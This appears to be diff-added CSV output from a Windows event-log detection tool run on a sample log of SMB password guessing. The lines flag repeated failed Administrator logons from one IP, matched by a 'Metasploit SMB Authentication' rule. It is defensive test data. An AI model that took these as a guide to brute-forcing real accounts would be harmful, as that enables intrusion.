+2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P8MTs4Nkbm3ryqcp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Nyd7tr3y0BHmPLM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J5KiDQOEnDf6xEPN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3MBP1buuRcBRiQTG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXXdcg3MSqnGSvax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Kej7zgIDCNR5tnnp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gjM8SOeQXwytB6iw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XPNATM0IL05vtbZ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H56ci5gbBVzebS2j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6rRofLg1uxrojU7n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MAhtwTU8OttAhcxf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CwKgAR6OWbkFlxUy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lNZR4G0DVsXVg4A9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OZG99tl0RRN3cQoK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nwRzAutxa07Y1xE4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OwhvrVBSRa8RcCKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bLBwBys2favoK7BQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3oYpj1rGcsOWNSs7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IBogtzE6No62tJB9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQJICDi3T4LiwXZc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnlKkfHYT0ID3BWr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gw36XaWrYp2M9CZd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9aT76CAAER0H98I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TEOZfrP3IYmutAuq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zd54DAwwp0BJhhaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AR6Gc128RlPtwcPl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cpjS1YZy2sSRqzI3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EKeate89Gw1oEp0U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tBhApsBYa65Hxr0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITv5RS3WHhWe0Hez  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WASvcAp9zfU3uSka  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H1f6szOactEp5ntF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Loe5RkT9Ki0Aw2Lv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJdVtE7dNSoyM3LI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QlAtU1mIO7m5DnuP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wAK2rh94yKwiH2Nw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AuqsvmUbPlpWFBRZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BShEB6VnXkOxwtFB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AjAc5QMvpTBsDziO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fwwp5CD20dR8QrIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tL6GzVzndZL7DZMN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zK5IpESvDA2DexwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qvTyabCyGaxscOrN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FW8VghddPwP5C6dO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGZuyZ0LErZ3Sgty  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bT1xrvfndr5R8Vg3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
